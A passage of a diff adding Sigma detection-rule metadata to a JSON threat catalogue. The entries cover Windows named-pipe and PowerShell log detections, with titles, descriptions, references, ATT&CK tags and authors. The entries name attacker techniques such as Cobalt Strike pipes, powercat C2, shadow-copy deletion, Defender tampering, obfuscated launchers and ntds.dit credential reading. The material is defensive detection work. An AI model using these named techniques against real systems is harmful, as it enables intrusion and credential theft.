"1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "value": "ADFS Database Named Pipe Connection", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", + "https://o365blog.com/post/adfs/", + "https://github.com/Azure/SimuLand", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ], + "creation_date": "2021/10/08", + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Processes in the filter condition" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "value": "CobaltStrike Named Pipe Patterns", + "meta": { + "refs": [ + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/07/30", + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml", + "author": "Florian Roth, Christian Burkard", + "level": "high", + "falsepositive": [ + "Chrome instances using the exact same pipe name \"mojo.something\"" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", + "value": "WMI Event Consumer Created 
Named Pipe", + "meta": { + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml" + ], + "tags": [ + "attack.t1047", + "attack.execution" + ], + "creation_date": "2021/09/01", + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "pipe_created", + "logsource.product": "windows" + } + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", + "value": "Alternate PowerShell Hosts", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/08/11", + "filename": "posh_pc_alternate_powershell_hosts.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "medium", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "value": "Delete Volume Shadow Copies Via WMI With PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ], + "creation_date": "2021/06/03", + "filename": "posh_pc_delete_volume_shadow_copies.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "uuid": "6331d09b-4785-4c13-980f-f96661356249", + "value": "PowerShell Downgrade Attack - PowerShell", + "meta": { + "refs": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/22", + "filename": "posh_pc_downgrade_attack.yml", + "author": "Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects PowerShell called from an executable by the version mismatch method", + "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "value": "PowerShell Called from an Executable Version Mismatch", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_pc_exe_calling_ps.yml", + 
"author": "Sean Metcalf (source), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", + "value": "Netcat The Powershell Version", + "meta": { + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ], + "creation_date": "2021/07/21", + "filename": "posh_pc_powercat.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote PowerShell sessions", + "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "value": "Remote PowerShell Session (PS Classic)", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2019/08/10", + "filename": "posh_pc_remote_powershell_session.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "high", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects renamed powershell", + "uuid": 
"30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", + "value": "Renamed Powershell Under Powershell Channel", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/06/29", + "filename": "posh_pc_renamed_powershell.yml", + "author": "Harish Segar, frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/07/13", + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious PowerShell download command", + "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", + "value": "Suspicious PowerShell Download", + "meta": { + "refs": [ + 
"https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2017/03/05", + "filename": "posh_pc_susp_download.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "value": "Use Get-NetTCPConnection", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ], + "creation_date": "2021/12/10", + "filename": "posh_pc_susp_get_nettcpconnection.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ], + "creation_date": "2021/07/20", + "filename": "posh_pc_susp_zip_compress.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", + "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "value": "Tamper Windows Defender - PSClassic", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2021/06/07", + "filename": "posh_pc_tamper_with_windows_defender.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_provider_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "value": "Suspicious Non PowerShell WSMAN COM Provider", + "meta": { + "refs": [ + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://github.com/bohops/WSMan-WinRM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + 
"attack.t1021.003" + ], + "creation_date": "2020/06/24", + "filename": "posh_pc_wsman_com_provider_no_powershell.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", + "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/06/29", + "filename": "posh_pc_xor_commandline.yml", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_classic_start", + "logsource.product": "windows" + } + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "uuid": "64e8e417-c19a-475a-8d19-98ea705394cc", + "value": "Alternate PowerShell Hosts - PowerShell Module", + "meta": { + "refs": [ + "https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/08/11", + "filename": "posh_pm_alternate_powershell_hosts.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "medium", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP 
Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "uuid": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "value": "Bad Opsec Powershell Code Artifacts", + "meta": { + "refs": [ + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", + "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://www.mdeditor.tw/pl/pgRt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "posh_pm_bad_opsec_artifacts.yml", + "author": "ok @securonix invrep_de, oscd.community", + "level": "critical", + "falsepositive": [ + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." 
+ ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects keywords that could indicate clearing PowerShell history", + "uuid": "f99276ad-d122-4989-a09a-d00904a5f9d2", + "value": "Clear PowerShell History - PowerShell Module", + "meta": { + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2019/10/25", + "filename": "posh_pm_clear_powershell_history.yml", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for specific decompress commands in PowerShell logs. 
This could be an adversary decompressing files.", + "uuid": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", + "value": "PowerShell Decompress Commands", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/8", + "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140" + ], + "creation_date": "2020/05/02", + "filename": "posh_pm_decompress_commands.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "uuid": "b140afd9-474b-4072-958e-2ebb435abd68", + "value": "Suspicious Get-ADDBAccount Usage", + "meta": { + "refs": [ + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "creation_date": "2022/03/16", + "filename": "posh_pm_get_addbaccount.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. 
This could be an adversary capturing clipboard contents.", + "uuid": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", + "value": "PowerShell Get Clipboard", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ], + "creation_date": "2020/05/02", + "filename": "posh_pm_get_clipboard.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "uuid": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "posh_pm_invoke_obfuscation_clip.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "uuid": "2f211361-7dce-442d-b78a-c04039677378", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "meta": { + "refs": [ + 
"https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/11/08", + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "uuid": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", + "value": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/15", + "filename": "posh_pm_invoke_obfuscation_stdin.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "uuid": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", + "value": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + 
"creation_date": "2020/10/15", + "filename": "posh_pm_invoke_obfuscation_var.yml", + "author": "Jonathan Cheong, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "uuid": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "posh_pm_invoke_obfuscation_via_compress.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "uuid": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/18", + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "uuid": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "value": 
"Invoke-Obfuscation Via Stdin - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/12", + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "uuid": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "value": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/09", + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "uuid": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/08", + 
"filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "uuid": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/10/08", + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml", + "author": "Nikita Nazarov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "uuid": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "meta": { + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2020/10/13", + "filename": "posh_pm_invoke_obfuscation_via_var.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a 
network", + "uuid": "bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2", + "value": "Netcat The Powershell Version - PowerShell Module", + "meta": { + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ], + "creation_date": "2021/07/21", + "filename": "posh_pm_powercat.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Detects remote PowerShell sessions", + "uuid": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "value": "Remote PowerShell Session (PS Module)", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ], + "creation_date": "2019/08/10", + "filename": "posh_pm_remote_powershell_session.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "level": "high", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "logsource.category": "ps_module", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "uuid": 
